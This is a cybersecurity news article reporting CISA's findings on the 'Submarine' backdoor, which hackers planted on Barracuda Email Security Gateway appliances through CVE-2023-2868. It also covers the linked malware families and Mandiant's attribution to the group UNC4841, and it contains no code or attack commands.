31 July 2023

Hackers deployed new Submarine backdoor on compromised Barracuda servers


Hackers deployed new Submarine backdoor on compromised Barracuda servers

The US Cybersecurity and Infrastructure Security Agency (CISA) released technical details and Indicators of Compromise related to three different malware families deployed by hackers on compromised Barracuda Email Security Gateway (ESG) appliances.

First disclosed in May 2023, the attacks exploited a then zero-day vulnerability (CVE-2023-2868) to install malware on the hacked servers. The flaw is an OS command injection issue that can be exploited by a remote hacker to execute arbitrary Perl commands on the target system.

The vulnerability was identified on May 19 and a security patch to address the bug was applied to all ESG appliances worldwide on May 20, 2023. An investigation found evidence indicating that CVE-2023-2868 had been exploited since October 2022. An analysis showed that the attack involved three trojanized modules dubbed “Saltwater,” “SeaSpy,” and “Seaside.”

Now, CISA has published details on yet another malware found on hacked devices, which it calls “Submarine.”

CISA describes Submarine as a “novel persistent backdoor executed with root privileges that lives in a Structured Query Language (SQL) database on the ESG appliance.” The malware comprises multiple artifacts - including a SQL trigger, shell scripts, and a loaded library for a Linux daemon - that together enable execution with root privileges, persistence, command and control, and cleanup.

Google-owned threat intel firm Mandiant linked the Barracuda attacks to a suspected Chinese cyber-espionage group it tracks as UNC4841. The company said the campaign had impacted organizations across the public and private sectors worldwide, with almost a third being government agencies.

Back to the list

Latest Posts

North Korean Lazarus Group targets software devs in Operation 99 campaign

North Korean Lazarus Group targets software devs in Operation 99 campaign

Operation 99 aims to steal sensitive information, including source code, configuration files, API keys, and crypto wallet credentials.
20 January 2025
Threat actors impersonating Ukraine’s CERT using AnyDesk

Threat actors impersonating Ukraine’s CERT using AnyDesk

In these cases, threat actors sent requests to connect via AnyDesk, falsely claiming to represent CERT-UA.
20 January 2025
Europol's largest-ever operation seizes millions in criminal assets worldwide

Europol's largest-ever operation seizes millions in criminal assets worldwide

The global operation uncovered 83 crypto wallets and addresses linked to criminal organizations.
20 January 2025